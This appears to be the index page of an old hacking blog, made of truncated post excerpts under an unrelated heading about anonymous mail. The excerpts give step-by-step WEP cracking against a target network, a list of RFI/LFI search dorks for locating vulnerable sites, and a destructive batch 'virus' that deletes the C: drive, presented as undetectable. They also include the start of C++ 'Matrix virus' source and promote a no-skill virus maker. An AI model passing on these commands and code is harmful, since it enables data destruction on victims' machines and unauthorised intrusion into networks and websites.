Using Dynamic IP as Static IP

Everyone Like to send Anonymous Mail to your enemy or friend or teacher. Here is the Hacking tutorial for you to implement that. So i hope This will be best hack for you.

Sunday, 19 June 2011

How to Hack WiFi (WEP) Using Backtrack 4

1. Boot Live CD/DVD of BackTrack 4. After it boots, type in "startx" to start GUI2. Open new Konsole (backtrack's terminal).3. Type, not using qoutes, "airodump-ng wlan0". Now find the network you want to attack. Copy the BSSID and the channel (write down on piece of paper and keep handy)4. Open new Konsole, type "airodump-ng -w wep -c 11 --bssid 00:24:b2:80:d7:3c wlan0"   **X & 00:24:b2:80:d7:3c are examples of the channel and bssid you should have copied**5. You are now fixed...

Complete List Of RFi and LFI dorks

    RFI(Local File Inclusion)    inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=    inurl:/include/new-visitor.inc.php?lvc_include_dir=    inurl:/_functions.php?prefix=    inurl:/cpcommerce/_functions.php?prefix=    inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=    inurl:/modules/agendax/addevent.inc.php?agendax_path=    inurl:/ashnews.php?pathtoashnews=   ...

Default passwords for Access Points

Here s a huge list of Default Passwords for Access Point Devices.Click To Open The l...

Top 10 Essential tools for Hacking Wireless Networks

 As with any trade, it’s essential to have the right tools when testing your wireless network for security  vulnerabilities. Here are ten tools i m including that will assist you to increase the throughput of yur pen test.Laptop ComputerFor starters, you’ve got to a have a good test system — preferably a portable laptop computer. Although it is possible to perform wireless-security testing using a handheld device such as a Pocket PC, the tools available on such devices are limited...

How to Reset Your BIOS Password

Well guys, Here's a DOS trick for Windows 9x, that will reset (delete) your motherboard's BIOS password (aka CMOS password) without any need to open up your computer to remove the battery or mess with jumpers.This method can come in very handy in the event you ever lose and forget your BIOS password or if you acquire used computers where the unknown previous owners had BIOS passwords set (in fact, this happened to me long ago—I was given a used computer, but there was no way I could enter...

Terabit Virus Maker - Create virus easily without programming skills

King of Hackers as you know friends , since its inception has always been a blog that reports on topics of general interest computer without malice and all legal. However, the topic of today is somewhat unusual, sure many will call them enough attention. It is in this sense that I clarify that this post is for the sole purpose of informing them and prevent themabout how easy it is today to create viruses , but not so recommend a program to develop and...

Make Simple Virus ( C Formatter )

Copy this and type in notepad ! This Virus is Undetectable from Antivirus too..!@Echo offDel C:\ *.* |y And save that as .bat not .txt and RUN ITIt will delete the content of C:\ drive...PLEASE NoTe  =  dont run that .bat file on ur system .... it will delete Your 'C'AnyOne Dare To Run This will Delete all His C Disk > Beware EVEN I DIDN't TRY THIS........I WILL NOT RESPONSIBLE FOR ANYTH...

Matrix Virus

  Warning - Do not run it on your computerI'm gonna teach you how to make a virus named =|:|:|:|:|:|Matrix|:|:|:|:|:|=1-Open notepad2-Put in this code// The Matrix Virus// Created by W3irdo// Hazuras.com#include #include #include #include #include #include #include using namespace std;int main(){ keybd_event(VK_MENU,0x38,0,0);keybd_event(VK_RETURN,0x1c,0,0);keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);HANDLE...

Top 10 Most Dangerous BotNets, Malware [Fix]

Botnet is a collection of software robots, or bots, that run automatically. It is often associated with malicious software over network of computers using distributed computing. While botnets are often named after their malicious software name, there are typically multiple botnets in operation using the same malicious software families, but operated by different criminal entities.While the term “botnet” can be used to refer to any group of bots, such as IRC bots, this word is generally used...

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More